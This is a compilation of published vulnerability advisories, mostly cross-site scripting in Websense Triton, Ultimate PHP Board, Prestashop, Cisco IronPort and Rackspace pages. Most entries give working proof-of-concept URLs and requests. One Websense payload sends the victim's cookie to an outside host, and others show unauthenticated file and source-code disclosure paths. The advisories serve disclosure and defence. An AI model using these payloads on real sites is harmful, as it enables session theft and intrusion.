Search the Community

Websense Content Gateway Error Message Cross Site Scripting ------------------------------------------------------------------------ Error messages of Websense Content Gateway are vulnerable to Cross-Site Scripting ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the error messages of Websense Content Gateway process user-controllable data insecurely, rendering these pages vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140916/error_messages_of_websense_content_gateway_are_vulnerable_to_cross_site_scripting.html An example of a vulnerable URL parameter is the admin_msg parameter. The value of this parameter is a Base64 encoded error message. It is possible to include HTML and scripting code in the message, which is used as-is in the resulting error page. An attacker can construct a specially crafted HTML response, that must be encoded using Base64 and appended to the following URL: https://<target>:8081/configure/ssl_ui/eva-config/client-cert-import_wsoem.html?admin_msg=<payload> An attacker must trick victims into opening the attacker's specially crafted link. This is for example possible by sending a victim a link in an email or instant message. Once a victim opens the specially crafted link, arbitrary client-side scripting code will be executed in the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. Websense Reporting Cross Site Scripting ------------------------------------------------------------------------ Multiple Cross-Site Scripting vulnerabilities in Websense Reporting ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It has been found that Websense Reporting is affected by multiple Cross-Site Scripting issues. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140914/multiple_cross_site_scripting_vulnerabilities_in_websense_reporting.html One example of a vulnerable request parameter is the col. Its value is copied into the value of an HTML tag attribute; encapsulated in double quotation marks. The value echoed unmodified (without output encoding) in the application's response. This vulnerability can be reproduced using the following steps: - login into Admin GUI; - open the proof of concept below; - hover over 'Risk Class' in left corner. https://<target>:9443/explorer_wse/explorer_anon.exe?col=a86de%27onmouseover%3d%27alert%28document.cookie%29%27de90f&delAdmin=0&startDate=2014-07-31&endDate=2014-08-01 An attacker must trick victims into opening the attacker's specially crafted link. This is for example possible by sending a victim a link in an email or instant message. Once a victim opens the specially crafted link, arbitrary client-side scripting code will be executed in the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. Websense Explorer Report Scheduler Cross Site Scripting ------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Websense Explorer report scheduler ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the report scheduler of Websense Explorer is vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140911/cross_site_scripting_vulnerability_in_websense_explorer_report_scheduler.html An attacker can schedule a report containing a specially crafted ReportName that will trigger this vulnerability. An attacker can use this issue to inject malicious JavaScript code into the output of the application. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. The following proof of concept can be used to demonstrate this issue: https://<target>:9443/Websense/cgi-bin/WsCgiExplorerSchedule.exe?pageAction=confirm&KeepTrend=&rangeAll=&emailListChain=%5Ehan.sahin%40securify.nl&SchedulePage=RunWeekly&DayOfWeek=Saturday&StartHour=21&StartMinute=30&emailList=%5Ehan.sahin%40securify.nl&EmailSubject=&EmailText=&ReportName=XSS<img+src%3dx+onerror%3dthis.src%3d'https%3a//www.securify.nl/%3fc%3d'%2bdocument.cookie>&outputFormat=.pdf&DateRangeType=AllDates Websense Data Security Cross Site Scripting ------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Websense Data Security block page ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that the Websense Data Security block page processes user-controllable data insecurely, rendering the block page is vulnerable to Cross-Site Scripting. Cross-Site Scripting allows an attacker to perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140910/cross_site_scripting_vulnerability_in_websense_data_security_block_page.html In order to exploit this vulnerability a valid ws-session is required. The payload has to be Base64 encoded, submitted to the block page via the ws-encdata URL parameter. For example, the following parameters can be submitted to the block page. ws-session=18446744072585574752&ws-userip=1.2.3.4--><iframe>0&ws-cat=76&ws-reason=1029 The above parameters must then be encoded with Base64 and appended to the following URL: http://<target>:15871/cgi-bin/moreBlockInfo.cgi?ws-encdata=<payload> An attacker must trick victims into opening the attacker's specially crafted link. This is for example possible by sending a victim a link in an email or instant message. Once a victim opens the specially crafted link, arbitrary client-side scripting code will be executed in the victim's browser. The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session tokens or login credentials, performing arbitrary actions on their behalf, logging their keystrokes. Websense Explorer Missing Access Control ------------------------------------------------------------------------ Missing access control on Websense Explorer web folder ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ It was discovered that no access control is enforced on the explorer_wse path, which is exposed through the web server. An attacker can abuse this issue to download any file exposed by this path, including security reports and Websense Explorer configuration files. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ https://www.securify.nl/advisory/SFY20140909/missing_access_control_on_websense_explorer_web_folder.html When a scheduled report has run, the report file is sent to recipients as an email attachment. Scheduled reports are also saved within explorer_wse, which is accessible for unauthenticated users. This vulnerability allows unauthenticated (proxy) users to download resources from the Websense reporting folder. Including confidential Web Security incidents reports Websense Explorer configuration files. For example: https://<target>:9443/explorer_wse/Other/1407992150/Securify_1407992150.xls https://<target>:9443/explorer_wse/websense.ini Websense Triton Source Code Disclosure ------------------------------------------------------------------------ Source code disclosure of Websense Triton JSP files via double quote character ------------------------------------------------------------------------ Han Sahin, September 2014 ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ Websense Triton is affected by a source code disclosure vulnerability. By appending a double quote character after JSP URLs, Websense will return the source code of the JSP instead of executing the JSP. An attacker can use this issue to inspect parts of Websense's source code in order to gain more knowledge about Websense's internals. ------------------------------------------------------------------------ Tested versions ------------------------------------------------------------------------ This issue was discovered on Websense Triton v7.8.3 and Websense appliance modules V-Series v7.7. Other versions may be affected as well. ------------------------------------------------------------------------ Fix ------------------------------------------------------------------------ Websense released hotfix 02 for Websense Triton v7.8.4 in which this issue is fixed. More information about this hotfix can be found at the following location: http://www.websense.com/support/article/kbarticle/v7-8-4-About-Hotfix-02-for-Web-Security-Solutions This issue is resolved in TRITON APX Version 8.0. More information about the fixed can be found at the following location: http://www.websense.com/support/article/kbarticle/Vulnerabilities-resolved-in-TRITON-APX-Version-8-0 ------------------------------------------------------------------------ Details ------------------------------------------------------------------------ httpa://www.securify.nl/advisory/SFY20140907/source_code_disclosure_of_websense_triton_jsp_files_via_double_quote_character.html By appending a double quote character after JSP URLs, Websense will return the source code of the JSP instead of executing the JSP. For example: https://<target>:9443/triton/login/pages/certificateDone.jsp%22 Information disclosure vulnerabilities aid attackers trying to compromise the web application.

Title: XSS Nokia.com PoC : Status: Raported References: Cross Site Scripting: OWASP Author: sleed

Threat Level: High Severity: High CVSS Severity score: 7.0 Impact: Complete Integrity, Confidentiality, and Availability violation. EBay Reference: #EIBBP-31480 Vulnerability: (1) Unauthenticated Cross-Site Scripting Vulnerability (1) Filtration Bypass Vendor Overview “eBay Inc. is an American multinational corporation and e-commerce company, providing consumer to consumer & business to consumer sales services via Internet. It is headquartered in San Jose, California, United States. The company manages eBay.com, an online auction and shopping website in which people and businesses buy and sell a broad variety of goods and services worldwide. In addition to its auction-style sales, the website has since expanded to include "Buy It Now" shopping; shopping by UPC, ISBN, or other kind of SKU (via Half.com); online classified advertisements (via Kijiji or eBay Classifieds); online event ticket trading (via StubHub); online money transfers (via PayPal) and other services. eBay was founded by Pierre Omidyar in 1995, and became a notable success story of the dot-com bubble; it is a multi-billion dollar business with operations localized in over thirty countries.” [1] [2] Description Application data utilizes in its output, user input that is not validated or properly encoded. The application is vulnerable to an unauthenticated Cross-Site Scripting attack. Vulnerabilities that permit these attacks, are widespread and persist anywhere a web application makes use of user input without any security validation controls. A malicious adversary can use this to compromise the trust of unsuspecting users, by tricking them into visiting a seemingly benign and trusted site. The malicious payload is embedded within a seemingly benign URL. This way an attacker can steal user credentials, to hijack a user’s session, to force a redirection to a heterogeneous third-party website, and thus to force a user’s browser to execute unsafe actions on behalf of the attacker. [3] [4] In this attack scenario it is noted that “Visitor -> Vendor” trust-levels are directly impacted. Read more: http://dl.packetstormsecurity.net/1503-exploits/eBay030315.pdf

Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Ultimate PHP Board (UPB) version 2.2.7 suffers from a cross site scripting vulnerability. # Exploit Title : Ultimate PHP Board (UPB) 2.2.7 Cross Site Scripting Vulnerability # CVE : CVE-2015-2217 # Date : 4 March 2015 # Exploit Author : CWH Underground # Discovered By : ZeQ3uL # Site : www.2600.in.th # Vendor Homepage : http://www.myupb.com # Software Link : http://downloads.sourceforge.net/project/textmb/UPB/UPB%202.2.7/upb2.2.7.zip # Version : 2.2.7 ,--^----------,--------,-----,-------^--, | ||||||||| `--------' | O .. CWH Underground .. `+---------------------------^----------| `\_,-------, _________________________| / XXXXXX /`| / / XXXXXX / `\ / / XXXXXX /\______( / XXXXXX / / XXXXXX / (________( `------' #################### SOFTWARE DESCRIPTION #################### Ultimate PHP Board is completely text based making it easy for anybody who has access to PHP can run a message board of their own without the need for MySQL. #################################### DESCRIPTION FOR CROSS SITE SCRIPTING #################################### myUPB is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks. myUPB 2.2.7 is vulnerable; other versions may also be affected. #################### VULNERABILITY DETAIL #################### 1. Reflect Cross Site Scripting (search.php) POC: /search.php?q='><script>alert(1)</script> 2. Stored Cross Site Scripting (profile.php) POC: POST /upb/profile.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: th-th,th;q=0.8,en-us;q=0.6,en-gb;q=0.4,en;q=0.2 Accept-Encoding: gzip, deflate Referer: http://localhost/upb/profile.php Cookie: timezone=0; lastvisit=1425552811; user_env=test; uniquekey_env=8806b913721aaf992f09134c89031d58; power_env=1; id_env=2; PHPSESSID=5jjiir5d83mbqh2s7da0gckd97 Connection: keep-alive Content-Type: multipart/form-data; boundary=---------------------------287611866431947 Content-Length: 716 -----------------------------287611866431947 Content-Disposition: form-data; name="u_email" t@t.com -----------------------------287611866431947 Content-Disposition: form-data; name="u_loca" th -----------------------------287611866431947 Content-Disposition: form-data; name="avatar" images/avatars/chic.jpg'><script>alert("hacked");</script> -----------------------------287611866431947 Content-Disposition: form-data; name="u_site" http:// -----------------------------287611866431947 Content-Disposition: form-data; name="u_timezone" 0 -----------------------------287611866431947 Content-Disposition: form-data; name="u_edit" Submit -----------------------------287611866431947-- ################################################################################################################ Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2 ################################################################################################################ Source

Services Affected: http://www.Rackspace.com Threat Level: High Severity: High CVSS Severity Score: 7.0 Impact type: Complete confidentiality, integrity and availability violation. Vulnerability: (2) Unauthenticated Cross-Site Scripting Vulnerabilities / HTML Injections (2) Filtration Bypass Vendor Overview Rackspace Inc. is a managed cloud computing company based in Windcrest, Texas, USA a suburb of San Antonio, Texas. The company has offices in Australia, U.K, Switzerland, Israel, The Netherlands, India and Hong Kong; with data centers located in various states such as Texas, Illinois, Virginia. Rackspace is the global leader in hybrid cloud and the founder of OpenStack, the open-source operating system for the cloud. [1] The company was founded in 1998 by Richard Yoo and Dirk Elmendorf in San Antonio, Texas. [1] Proof of Concept http://www.rackspace.com/information/legal/copyrights_trademarks?"></script><script>alert(String.fromCh arCode(65,73,83));alert("Security");alert("Corporation");prompt("Enter-Password:");</script> Proof of Concept http://www.rackspace.com/pt/information/legal/mailterms?'"-- ></style></script><script>alert(String.fromcharCode(65,73,83));alert(document.cookie);</script> References [1] Wikipedia (2014). Rackspace | Wikipedia Rackspace. [Online] Available at: Rackspace - Wikipedia, the free encyclopedia [Last Accessed 15 Apr. 2014] [2] OWASP Website. (2014). Cross-Site Scripting (XSS) [Online] Available at: https://www.owasp.org/index.php/Cross_site_scripting [Last Accessed 15 Apr. 2014] [3] Microsoft Corporation. (2014). Microsoft Support | How to prevent Cross-Site Scripting attacks [Online] Available at: How to prevent cross-site scripting security issues [Last Accessed 15 Apr. 2014] Read more: http://dl.packetstormsecurity.net/1502-exploits/Rackspace-Report.pdf

Cisco Ironport AsyncOS Cross Site Scripting Vendor: Cisco Product webpage: http://www.cisco.com Affected version(s): Cisco Ironport ESA - AsyncOS 8.0.1-023 Cisco Ironport WSA - AsyncOS 8.5.5-022 Cisco Ironport SMA - AsyncOS 8.4.0-126 Date: 24/02/2015 Credits: Glafkos Charalambous CVE: CVE-2013-6780 Disclosure Timeline: 28-10-2014: Vendor Notification 28-10-2014: Vendor Response/Feedback 22-01-2015: Vendor Fix/Patch 24-02-2015: Public Disclosure Description: Cisco AsyncOS is vulnerable to unauthenticated Cross-site scripting (XSS), caused by improper validation of user supplied input in the (uploader.swf) Uploader component in Yahoo! versions 2.5.0 through 2.9.0. An attacker is able to inject arbitrary web script or HTML via the allowedDomain parameter. XSS Payload: http(s)://domain.com/yui/uploader/assets/uploader.swf?allowedDomain=\"})))}catch(e){alert('XSS');}// References: https://tools.cisco.com/bugsearch/bug/CSCur44409 https://tools.cisco.com/bugsearch/bug/CSCur89626 https://tools.cisco.com/bugsearch/bug/CSCur89624 http://yuilibrary.com/support/20131111-vulnerability/ http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-6780 https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6780 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.22 (MingW32) mQENBFE6TCMBCADQKVLT3xkJDQpUE6M3akJdFRWgFEy2pwoDbnOGDhw6yQYObDEuUlixRV5u xaIwzh9xPSS36B72bhQC3isHuqDu3xVhx9OX7XlLheXDZJdRbNIXQ3YPk1uYQizuoIpHq08x Eq4V2CXq7ovZPhWI6+iJt6QkVYvZXJdyoTKT8bLaFSOEfLeyAgkCQdXOgnzmNWeedxp0xGAj KL7qIhLETp/MK46ndo5hF8RIbVs59gWdu4GxXr96qViJLiAYO1dQNLc+LShMnue91neTjLoe JkpgqLfEGKV459eCJNqxlylIVbxyTmigExftZKAdNFHat0txK0fB/bLOwRnNFqYWQxanABEB AAG0KEdsYWZrb3MgQ2hhcmFsYW1ib3VzIDxnbGFma29zQGdtYWlsLmNvbT6JATgEEwECACIF AlE6TCMCGw8GCwkIBwMCBhUIAgkKCwQWAgMBAh4BAheAAAoJEHAhLSD814yOAcoIALO6d2AQ M0l9KD9hPIody4VYOgY8stBrumI+t8njzJOYCCLdzB781vCAa0vINPFuFxGp2e8EfMfvf8+Z S6kC8EOQ6XyC8eq6imc1Q+tFMwTgykJZPFdosfXjBwg9jos/CR4dI6RZuzGC/FdXjpTAypbE n3m2a+DBb6CUPeB9nVQq6ukRGbuZ8S+veWRNFwKkTSwC0HKtf9Od+JBrLKesNa3LWLo8q7+d V3VS8rf8cmOOGBuaITzj87iRpgAgkF3MATa1Vb2nbbdYMpvHbzoj62mSqRiyEp1SOY9XkgcL 2ORsjgjww7GpH3F8LFvaHSHVz+037+E/+i/OSTS7o6gY4eI= =yiro -----END PGP SIGNATURE----- Source

CVE-2015-1175-xss-prestashop Information ——————– Advisory by Octogence. Name: Reflected XSS Vulnerability in prestashop ecommerce software Affected Software : Prestashop Affected Versions: 1.6.0.9 and possibly below Vendor Homepage : https://www.prestashop.com/ Vulnerability Type : Cross-site Scripting Severity : High CVE ID: CVE-2015-1175 Impact —— An attacker can craft a URL with malicious JavaScript code which executes in the browser. Technical Details —————– Sample URL: http://localhost/prestashop/prestashop/modules/blocklayered/blocklayered-ajax.php?layered_id_feature_20=20_7&id_category_layered=8&layered_price_slider=16_532f363<img%20src%3da%20onerror%3dalert(1)>9c032&orderby=position&orderway=asctrue&_=1420314938300 Parameter: layered_price_slider Sample Payload: <img src=a onerror=alert(1)> For more information on cross-site scripting vulnerabilities read the following article: https://www.owasp.org/index.php/Cross-site_Scripting_(XSS) Advisory Timeline (mm/dd/yyyy) ——————– 01/07/2015 – Reported 01/12/2015 – Vulnerability Fixed 01/18/2015 – Advisory Released http://octogence.com/advisories/cve-2015-1175-xss-prestashop/ Regards Sudhanshu Octogence Tech Solutions Noida, India Mobile | +91-9971658929 Website| www.octogence.com Source : Prestashop 1.6.0.9 Cross Site Scripting ? Packet Storm